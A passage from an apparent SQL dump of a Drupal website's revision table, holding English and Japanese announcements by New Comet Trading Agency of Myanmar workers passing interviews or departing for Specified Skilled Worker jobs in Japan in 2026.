src=\"/sites/default/files/inline-images/0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg\" data-entity-uuid=\"5fd80362-b637-4ad6-9d68-2f9655a557d8\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg\" data-entity-uuid=\"02b0e92a-9f11-4c6d-8d0a-d74c1bb5130f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 165, 631, 'ja', 0, '<p data-start=\"1210\" data-end=\"1228\"><strong data-start=\"1210\" data-end=\"1228\">2026年6月3日 日本出発</strong></p><p data-start=\"1230\" data-end=\"1296\">ニューコメット・トレーディング・エージェンシーは、以下の4名の候補者が特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1298\" data-end=\"1376\">• THAE SU SU AYE さん<br>• HNIN YU WAR さん<br>• HSU MON HTET さん<br>• SHWE SIN WIN さん</p><p data-start=\"1378\" data-end=\"1432\">今回の出発は、日本での介護分野におけるキャリアを目指し、長期間にわたる準備と努力を重ねてきた成果となります。</p><p data-start=\"1434\" data-end=\"1486\">皆様の新たな挑戦を心よりお祝いするとともに、日本での生活と仕事が実り多いものとなることを願っております。</p><p data-start=\"1488\" data-end=\"1539\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。</p><img src=\"/sites/default/files/inline-images/0-02-05-045c83e0dbab5edb94ed3e02d3b5408f77782f2bc938d4e38c28f1d5e9009d8d_2269c80ab27.jpg\" data-entity-uuid=\"ca3d7c09-57cf-4fd3-9715-ac05967a4311\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-498d41b52747be1914370d778c7266b2519e1c63e048d3d2dc2753b0c61bc4bc_2269c80f4a9_0.jpg\" data-entity-uuid=\"592ef76f-594f-41b3-8101-bef062e3a807\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-5783259c5cb90811be09437c6a25f6b37815d871639b109a28054b0d662b8d5e_2269c815115.jpg\" data-entity-uuid=\"3d109e78-f787-47e2-8256-b38e4d903f44\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-bce8dd32e9c08b6128802b68caada6269fa36b43398e8203c60391414268d774_2269c8083c7.jpg\" data-entity-uuid=\"5fd80362-b637-4ad6-9d68-2f9655a557d8\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-05-495cfd4813203e14183c65b8fc25f508ea2c4f1611b042edd313a9e2ffc86cab_2269c80aa18.jpg\" data-entity-uuid=\"02b0e92a-9f11-4c6d-8d0a-d74c1bb5130f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 166, 632, 'ja', 0, '<p data-start=\"247\" data-end=\"281\"><strong data-start=\"247\" data-end=\"281\">Interview Success Announcement</strong></p><p data-start=\"283\" data-end=\"450\">New Comet Trading Agency is delighted to announce that Ms. Thu Thu Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p data-start=\"452\" data-end=\"573\">Her achievement reflects dedication, perseverance, and thorough preparation for a career in Japan\'s hospitality industry.</p><p data-start=\"575\" data-end=\"729\">We extend our heartfelt congratulations on this important accomplishment and wish her every success in the upcoming procedures and future career in Japan.</p><p data-start=\"731\" data-end=\"822\">We look forward to seeing her begin an exciting new chapter in the Japanese hotel industry.</p><p data-start=\"824\" data-end=\"871\">Congratulations and best wishes for the future.</p>', '', 'full_html'),
('activities', 0, 166, 633, 'en', 0, '<p data-start=\"247\" data-end=\"281\"><strong data-start=\"247\" data-end=\"281\">Interview Success Announcement</strong></p><p data-start=\"283\" data-end=\"450\">New Comet Trading Agency is delighted to announce that Ms. Thu Thu Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p data-start=\"452\" data-end=\"573\">Her achievement reflects dedication, perseverance, and thorough preparation for a career in Japan\'s hospitality industry.</p><p data-start=\"575\" data-end=\"729\">We extend our heartfelt congratulations on this important accomplishment and wish her every success in the upcoming procedures and future career in Japan.</p><p data-start=\"731\" data-end=\"822\">We look forward to seeing her begin an exciting new chapter in the Japanese hotel industry.</p><p data-start=\"824\" data-end=\"871\">Congratulations and best wishes for the future.</p>', '', 'full_html'),
('activities', 0, 166, 634, 'en', 0, '<p data-start=\"247\" data-end=\"281\"><strong data-start=\"247\" data-end=\"281\">Interview Success Announcement</strong></p><p data-start=\"283\" data-end=\"450\">New Comet Trading Agency is delighted to announce that Ms. Thu Thu Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p data-start=\"452\" data-end=\"573\">Her achievement reflects dedication, perseverance, and thorough preparation for a career in Japan\'s hospitality industry.</p><p data-start=\"575\" data-end=\"729\">We extend our heartfelt congratulations on this important accomplishment and wish her every success in the upcoming procedures and future career in Japan.</p><p data-start=\"731\" data-end=\"822\">We look forward to seeing her begin an exciting new chapter in the Japanese hotel industry.</p><p data-start=\"824\" data-end=\"871\">Congratulations and best wishes for the future.</p>', '', 'full_html'),
('activities', 0, 166, 634, 'ja', 0, '<p data-start=\"1022\" data-end=\"1035\"><strong data-start=\"1022\" data-end=\"1035\">面接合格のお知らせ</strong></p><p data-start=\"1037\" data-end=\"1110\">ニューコメット・トレーディング・エージェンシーは、THU THU AUNG さんが特定技能（宿泊）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1112\" data-end=\"1163\">今回の合格は、ご本人の努力と継続的な学習、そして日本の宿泊業界で働くという目標に向けた熱意の成果です。</p><p data-start=\"1165\" data-end=\"1215\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1217\" data-end=\"1249\">日本での新しいキャリアが実り多いものとなることを願っております。</p><p data-start=\"1251\" data-end=\"1262\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 167, 635, 'en', 0, '<p><strong>Departure to Japan – 23 April 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 23 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>• Phoo Pwint Kyaw<br>• Ei Zin Htwe<br>• Htay Htay Khaing<br>• Mai Tandar Naing</p><p>This achievement marks the beginning of an exciting new journey as they pursue career opportunities in Japan\'s food service industry.</p><p>We wish all four candidates success in their new workplaces and hope they gain valuable experience while building a bright future in Japan.</p><p>New Comet Trading Agency remains committed to supporting Myanmar workers in achieving their professional goals through overseas employment opportunities.</p><p>&nbsp;</p><img data-entity-uuid=\"c6268691-63a4-4280-971f-f60476616ad7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%204%20person%20%2823-4-2026%29%202.jpg\">', '', 'full_html'),
('activities', 0, 167, 636, 'en', 0, '<p><strong>Departure to Japan – 23 April 2026</strong></p><p>New Comet Trading Agency is pleased to announce that the following candidates successfully departed for Japan on 23 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>• Phoo Pwint Kyaw<br>• Ei Zin Htwe<br>• Htay Htay Khaing<br>• Mai Tandar Naing</p><p>This achievement marks the beginning of an exciting new journey as they pursue career opportunities in Japan\'s food service industry.</p><p>We wish all four candidates success in their new workplaces and hope they gain valuable experience while building a bright future in Japan.</p><p>New Comet Trading Agency remains committed to supporting Myanmar workers in achieving their professional goals through overseas employment opportunities.</p><p>&nbsp;</p><img data-entity-uuid=\"c6268691-63a4-4280-971f-f60476616ad7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%204%20person%20%2823-4-2026%29%202.jpg\">', '', 'full_html'),
('activities', 0, 167, 636, 'ja', 0, '<p data-start=\"1146\" data-end=\"1165\"><strong data-start=\"1146\" data-end=\"1165\">2026年4月23日 日本出発</strong></p><p data-start=\"1167\" data-end=\"1234\">ニューコメット・トレーディング・エージェンシーは、以下の4名の候補者が特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1236\" data-end=\"1323\">• PHOO PWINT KYAW さん<br>• EI ZIN HTWE さん<br>• HTAY HTAY KHAING さん<br>• MAI TANDAR NAING さん</p><p data-start=\"1325\" data-end=\"1354\">皆様は、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1356\" data-end=\"1402\">新しい職場で多くの経験を積み、充実した生活と明るい未来を築かれることを心より願っております。</p><p data-start=\"1404\" data-end=\"1455\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の海外就労を支援してまいります。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%204%20person%20%2823-4-2026%29%202.jpg\" data-entity-uuid=\"c6268691-63a4-4280-971f-f60476616ad7\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 168, 637, 'en', 0, '<p><strong>Interview Success in the Hospitality Sector</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Win Htet Htet Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p>This achievement demonstrates her commitment, preparation, and determination to pursue a professional career in Japan\'s hospitality industry.</p><p>We extend our sincere congratulations and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>May this accomplishment serve as the beginning of a rewarding and successful journey in the Japanese hotel sector.</p>', '', 'full_html'),
('activities', 0, 168, 638, 'en', 0, '<p><strong>Interview Success in the Hospitality Sector</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Win Htet Htet Aung has successfully passed the interview for a Specified Skilled Worker (Hotel) position in Japan.</p><p>This achievement demonstrates her commitment, preparation, and determination to pursue a professional career in Japan\'s hospitality industry.</p><p>We extend our sincere congratulations and wish her continued success throughout the upcoming procedures and her future career in Japan.</p><p>May this accomplishment serve as the beginning of a rewarding and successful journey in the Japanese hotel sector.</p>', '', 'full_html'),
('activities', 0, 168, 638, 'ja', 0, '<p data-start=\"1026\" data-end=\"1044\"><strong data-start=\"1026\" data-end=\"1044\">宿泊分野 面接合格のお知らせ</strong></p><p data-start=\"1046\" data-end=\"1125\">ニューコメット・トレーディング・エージェンシーは、WIN HTET HTET AUNG さんが特定技能（宿泊）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1127\" data-end=\"1184\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本の宿泊業界で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1186\" data-end=\"1226\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1228\" data-end=\"1269\">この素晴らしい成果が、日本での充実したキャリアの第一歩となることを願っております。</p><p data-start=\"1271\" data-end=\"1282\">おめでとうございます。</p>', '', 'full_html'),
('activities', 0, 169, 639, 'en', 0, '<p><strong>Embarking on a New Journey in Japan</strong></p><p>New Comet Trading Agency is proud to announce that the following candidates successfully departed for Japan on 10 May 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>• Thandar Moe<br>• Thet Mon Soe<br>• Mi Mi Kyaw</p><p>After completing their preparations and training, they have taken an important step toward building their careers in Japan\'s caregiving sector.</p><p>We wish them success in their new workplaces and hope they enjoy a rewarding experience while contributing their skills and dedication to the communities they serve.</p><p>May this new chapter bring personal growth, professional achievement, and a bright future ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2810-5-2026%29%203%20person%20-2%20.jpg\" data-entity-uuid=\"f2947aa6-e1b8-4c14-a91e-3a2d7c90a734\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 169, 640, 'en', 0, '<p><strong>Embarking on a New Journey in Japan</strong></p><p>New Comet Trading Agency is proud to announce that the following candidates successfully departed for Japan on 10 May 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>• Thandar Moe<br>• Thet Mon Soe<br>• Mi Mi Kyaw</p><p>After completing their preparations and training, they have taken an important step toward building their careers in Japan\'s caregiving sector.</p><p>We wish them success in their new workplaces and hope they enjoy a rewarding experience while contributing their skills and dedication to the communities they serve.</p><p>May this new chapter bring personal growth, professional achievement, and a bright future ahead.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2810-5-2026%29%203%20person%20-2%20.jpg\" data-entity-uuid=\"f2947aa6-e1b8-4c14-a91e-3a2d7c90a734\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 169, 640, 'ja', 0, '<p data-start=\"1073\" data-end=\"1087\"><strong data-start=\"1073\" data-end=\"1087\">日本での新たな挑戦へ</strong></p><p data-start=\"1089\" data-end=\"1166\">ニューコメット・トレーディング・エージェンシーは、以下の3名の候補者が2026年5月10日に特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1168\" data-end=\"1222\">• THANDAR MOE さん<br>• THET MON SOE さん<br>• MI MI KYAW さん</p><p data-start=\"1224\" data-end=\"1261\">皆様は研修と準備を終え、日本の介護分野で新たなキャリアをスタートされます。</p><p data-start=\"1263\" data-end=\"1305\">新しい環境の中で多くの経験を積み、成長と成功を重ねられることを心より願っております。</p><p data-start=\"1307\" data-end=\"1335\">今後のご活躍と充実した日本での生活をお祈り申し上げます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2810-5-2026%29%203%20person%20-2%20.jpg\" data-entity-uuid=\"f2947aa6-e1b8-4c14-a91e-3a2d7c90a734\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 170, 641, 'en', 0, '<p><strong>A Remarkable Achievement in the Caregiving Sector</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Aye Aye Myint has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p>Her success reflects determination, hard work, and a strong commitment to pursuing a professional career in Japan\'s caregiving industry.</p><p>We extend our heartfelt congratulations on this achievement and wish her every success in the upcoming procedures and future employment in Japan.</p><p>May this accomplishment serve as a stepping stone toward a rewarding and meaningful career dedicated to supporting others through caregiving services.</p><p>Congratulations on this wonderful achievement.</p>', '', 'full_html'),
('activities', 0, 170, 642, 'en', 0, '<p><strong>A Remarkable Achievement in the Caregiving Sector</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Aye Aye Myint has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p>Her success reflects determination, hard work, and a strong commitment to pursuing a professional career in Japan\'s caregiving industry.</p><p>We extend our heartfelt congratulations on this achievement and wish her every success in the upcoming procedures and future employment in Japan.</p><p>May this accomplishment serve as a stepping stone toward a rewarding and meaningful career dedicated to supporting others through caregiving services.</p><p>Congratulations on this wonderful achievement.</p>', '', 'full_html'),
('activities', 0, 170, 642, 'ja', 0, '<p data-start=\"1106\" data-end=\"1124\"><strong data-start=\"1106\" data-end=\"1124\">介護分野 面接合格のお知らせ</strong></p><p data-start=\"1126\" data-end=\"1200\">ニューコメット・トレーディング・エージェンシーは、AYE AYE MYINT さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1202\" data-end=\"1259\">今回の合格は、ご本人の努力と熱心な準備の成果であり、日本の介護分野で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1261\" data-end=\"1301\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p><p data-start=\"1303\" data-end=\"1351\">この素晴らしい成果が、介護の専門人材としての充実したキャリアの第一歩となることを願っております。</p><p data-start=\"1353\" data-end=\"1364\">おめでとうございます。</p><p data-start=\"1353\" data-end=\"1364\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 171, 643, 'en', 0, '<p><strong>Departure to Japan – 26 April 2026</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. May Phyoe Thu successfully departed for Japan on 26 April 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>This marks an important milestone in her journey toward building a professional career in Japan\'s caregiving sector. Through dedication, preparation, and determination, she has taken a significant step toward achieving her career goals.</p><p>We extend our heartfelt congratulations and wish her success, happiness, and personal growth as she begins this new chapter in Japan.</p><p>May her experience be rewarding and inspiring, both professionally and personally.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%202.jpg\" data-entity-uuid=\"12a9066d-2d55-40e5-a136-db747358582b\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%203.jpg\" data-entity-uuid=\"3316e771-e7d7-49bb-ad65-29995729ec49\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 171, 644, 'en', 0, '<p><strong>Departure to Japan – 26 April 2026</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. May Phyoe Thu successfully departed for Japan on 26 April 2026 under the Specified Skilled Worker (Kaigo) Program.</p><p>This marks an important milestone in her journey toward building a professional career in Japan\'s caregiving sector. Through dedication, preparation, and determination, she has taken a significant step toward achieving her career goals.</p><p>We extend our heartfelt congratulations and wish her success, happiness, and personal growth as she begins this new chapter in Japan.</p><p>May her experience be rewarding and inspiring, both professionally and personally.</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%202.jpg\" data-entity-uuid=\"12a9066d-2d55-40e5-a136-db747358582b\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%203.jpg\" data-entity-uuid=\"3316e771-e7d7-49bb-ad65-29995729ec49\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 171, 644, 'ja', 0, '<p data-start=\"1082\" data-end=\"1101\"><strong data-start=\"1082\" data-end=\"1101\">2026年4月26日 日本出発</strong></p><p data-start=\"1103\" data-end=\"1176\">ニューコメット・トレーディング・エージェンシーは、MAY PHYOE THU さんが特定技能（介護）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1178\" data-end=\"1232\">日本の介護分野で新たなキャリアをスタートされることとなり、ご本人にとって大きな節目となる素晴らしい機会です。</p><p data-start=\"1234\" data-end=\"1283\">これまでの努力が実を結び、日本での新しい生活と仕事が充実したものとなることを心より願っております。</p><p data-start=\"1285\" data-end=\"1309\">今後のご活躍とさらなる成長をお祈り申し上げます。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%202.jpg\" data-entity-uuid=\"12a9066d-2d55-40e5-a136-db747358582b\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2826-4-2026%29%20May%20Phyoe%20Thu%203.jpg\" data-entity-uuid=\"3316e771-e7d7-49bb-ad65-29995729ec49\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 173, 647, 'en', 0, '<p><strong>Departure to Japan – 22 April 2026</strong></p><p>New Comet Trading Agency is delighted to announce that the following candidates successfully departed for Japan on 22 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>• Ei Ei Khet<br>• Toe Toe Hlaing<br>• Thri Shin Thant<br>• Hnin Wa Than<br>• Su Myat Thu<br>• Myat Phoo Thaw<br>• Myat Noe Khin<br>• Hsu Wyne Wyne Pyae<br>• Khit Yu Ya Soe</p><p>After completing their language studies, skills training, and interview preparations, these candidates have taken an important step toward building successful careers in Japan.</p><p>We wish them all the best as they begin this exciting journey and embrace new opportunities in Japan\'s food service industry. May their hard work and determination lead them to a bright and successful future.</p><p>New Comet Trading Agency is proud to support Myanmar workers in achieving their international career goals.</p><img data-entity-uuid=\"a9d567ab-8592-4871-bf00-8e175f7b3141\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%202.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"c19f16b1-c33d-42a4-b025-ee14026fc86c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%203.jpg\"><img data-entity-uuid=\"6c25a8b3-deae-4404-9f2b-b9aabe78dbf7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%204.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 173, 648, 'en', 0, '<p><strong>Departure to Japan – 22 April 2026</strong></p><p>New Comet Trading Agency is delighted to announce that the following candidates successfully departed for Japan on 22 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>• Ei Ei Khet<br>• Toe Toe Hlaing<br>• Thri Shin Thant<br>• Hnin Wa Than<br>• Su Myat Thu<br>• Myat Phoo Thaw<br>• Myat Noe Khin<br>• Hsu Wyne Wyne Pyae<br>• Khit Yu Ya Soe</p><p>After completing their language studies, skills training, and interview preparations, these candidates have taken an important step toward building successful careers in Japan.</p><p>We wish them all the best as they begin this exciting journey and embrace new opportunities in Japan\'s food service industry. May their hard work and determination lead them to a bright and successful future.</p><p>New Comet Trading Agency is proud to support Myanmar workers in achieving their international career goals.</p><img data-entity-uuid=\"a9d567ab-8592-4871-bf00-8e175f7b3141\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%202.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"c19f16b1-c33d-42a4-b025-ee14026fc86c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%203.jpg\"><img data-entity-uuid=\"6c25a8b3-deae-4404-9f2b-b9aabe78dbf7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%204.jpg\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 173, 648, 'ja', 0, '<p data-start=\"1305\" data-end=\"1324\"><strong data-start=\"1305\" data-end=\"1324\">2026年4月22日 日本出発</strong></p><p data-start=\"1326\" data-end=\"1393\">ニューコメット・トレーディング・エージェンシーは、以下の9名の候補者が特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1395\" data-end=\"1585\">• EI EI KHET さん<br>• TOE TOE HLAING さん<br>• THRI SHIN THANT さん<br>• HNIN WA THAN さん<br>• SU MYAT THU さん<br>• MYAT PHOO THAW さん<br>• MYAT NOE KHIN さん<br>• HSU WYNE WYNE PYAE さん<br>• KHIT YU YA SOE さん</p><p data-start=\"1587\" data-end=\"1629\">皆様は日本語学習や面接準備を経て、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1631\" data-end=\"1674\">日本で多くの経験を積み、それぞれの目標に向かって成長されることを心より願っております。</p><p data-start=\"1676\" data-end=\"1729\">ニューコメット・トレーディング・エージェンシーは、これからもミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%202.jpg\" data-entity-uuid=\"a9d567ab-8592-4871-bf00-8e175f7b3141\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%203.jpg\" data-entity-uuid=\"c19f16b1-c33d-42a4-b025-ee14026fc86c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Departure%20%2822-4-2026%29%209%20person%204.jpg\" data-entity-uuid=\"6c25a8b3-deae-4404-9f2b-b9aabe78dbf7\" data-entity-type=\"file\"><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 174, 649, 'en', 0, '<p data-start=\"267\" data-end=\"304\"><strong data-start=\"267\" data-end=\"304\">Departure to Japan – 1 April 2026</strong></p><p data-start=\"306\" data-end=\"483\">New Comet Trading Agency is pleased to announce that Ms. Shwe Zin Phyo successfully departed for Japan on 1 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"485\" data-end=\"628\">After dedicated preparation and training, she has taken an important step toward building a successful career in Japan\'s food service industry.</p><p data-start=\"630\" data-end=\"777\">This departure marks the beginning of a new chapter filled with opportunities for professional development, cultural exchange, and personal growth.</p><p data-start=\"779\" data-end=\"911\">We sincerely congratulate her on this achievement and wish her success and happiness as she starts her new life and career in Japan.</p><p data-start=\"913\" data-end=\"1054\">New Comet Trading Agency will continue supporting Myanmar workers in achieving their dreams of working abroad and building a brighter future.</p><img data-entity-uuid=\"46cf94f9-086b-44fc-ac26-fa924bd93acc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%202.jpg\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p><img data-entity-uuid=\"238fceba-cf2d-4b11-8af8-19685b9398e3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%203.jpg\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 174, 650, 'en', 0, '<p data-start=\"267\" data-end=\"304\"><strong data-start=\"267\" data-end=\"304\">Departure to Japan – 1 April 2026</strong></p><p data-start=\"306\" data-end=\"483\">New Comet Trading Agency is pleased to announce that Ms. Shwe Zin Phyo successfully departed for Japan on 1 April 2026 under the Specified Skilled Worker (Food Service) Program.</p><p data-start=\"485\" data-end=\"628\">After dedicated preparation and training, she has taken an important step toward building a successful career in Japan\'s food service industry.</p><p data-start=\"630\" data-end=\"777\">This departure marks the beginning of a new chapter filled with opportunities for professional development, cultural exchange, and personal growth.</p><p data-start=\"779\" data-end=\"911\">We sincerely congratulate her on this achievement and wish her success and happiness as she starts her new life and career in Japan.</p><p data-start=\"913\" data-end=\"1054\">New Comet Trading Agency will continue supporting Myanmar workers in achieving their dreams of working abroad and building a brighter future.</p><img data-entity-uuid=\"46cf94f9-086b-44fc-ac26-fa924bd93acc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%202.jpg\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p><img data-entity-uuid=\"238fceba-cf2d-4b11-8af8-19685b9398e3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%203.jpg\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 174, 650, 'ja', 0, '<p data-start=\"1223\" data-end=\"1241\"><strong data-start=\"1223\" data-end=\"1241\">2026年4月1日 日本出発</strong></p><p data-start=\"1243\" data-end=\"1317\">ニューコメット・トレーディング・エージェンシーは、SHWE ZIN PHYO さんが特定技能（外食業）として日本へ出発されたことをご報告いたします。</p><p data-start=\"1319\" data-end=\"1358\">これまでの努力と準備を経て、日本の外食業界で新たなキャリアをスタートされます。</p><p data-start=\"1360\" data-end=\"1405\">今回の出発は、ご本人にとって大きな成長と挑戦の機会であり、新しい未来への第一歩となります。</p><p data-start=\"1407\" data-end=\"1459\">日本での生活と仕事が充実したものとなり、多くの成功と素晴らしい経験に恵まれることを心より願っております。</p><p data-start=\"1461\" data-end=\"1512\">ニューコメット・トレーディング・エージェンシーは、今後もミャンマー人材の日本就職を支援してまいります。</p><img src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%202.jpg\" data-entity-uuid=\"46cf94f9-086b-44fc-ac26-fa924bd93acc\" data-entity-type=\"file\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Departure%20%281-4-2026%29%20Shwe%20Zin%20Phyo%203.jpg\" data-entity-uuid=\"238fceba-cf2d-4b11-8af8-19685b9398e3\" data-entity-type=\"file\"><p data-start=\"913\" data-end=\"1054\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 175, 651, 'en', 0, '<p><strong>Departure to Japan – 29 March 2026</strong></p><p>New Comet Trading Agency is delighted to announce that Ms. Win Win Thu successfully departed for Japan on 29 March 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>Her departure represents the beginning of an exciting new chapter as she pursues career opportunities in Japan\'s food service industry.</p><p>Through hard work, determination, and careful preparation, she has taken an important step toward achieving her professional goals abroad.</p><p>We wish her continued success, happiness, and valuable experiences as she begins her new life and career in Japan.</p><p>New Comet Trading Agency remains committed to supporting Myanmar workers in building successful international careers.</p><img data-entity-uuid=\"c8acaa1f-88f4-442a-a773-27b09b321a1d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%202.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"61e5b1a6-5ba5-40f5-8f6f-a35a02349ded\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%203.jpg\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 175, 652, 'en', 0, '<p><strong>Departure to Japan – 29 March 2026</strong></p><p>New Comet Trading Agency is delighted to announce that Ms. Win Win Thu successfully departed for Japan on 29 March 2026 under the Specified Skilled Worker (Food Service) Program.</p><p>Her departure represents the beginning of an exciting new chapter as she pursues career opportunities in Japan\'s food service industry.</p><p>Through hard work, determination, and careful preparation, she has taken an important step toward achieving her professional goals abroad.</p><p>We wish her continued success, happiness, and valuable experiences as she begins her new life and career in Japan.</p><p>New Comet Trading Agency remains committed to supporting Myanmar workers in building successful international careers.</p><img data-entity-uuid=\"c8acaa1f-88f4-442a-a773-27b09b321a1d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%202.jpg\"><p>&nbsp;</p><img data-entity-uuid=\"61e5b1a6-5ba5-40f5-8f6f-a35a02349ded\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Departure%20%2829-3-2026%29%20Win%20Win%20Thu%203.jpg\">', '', 'full_html'),
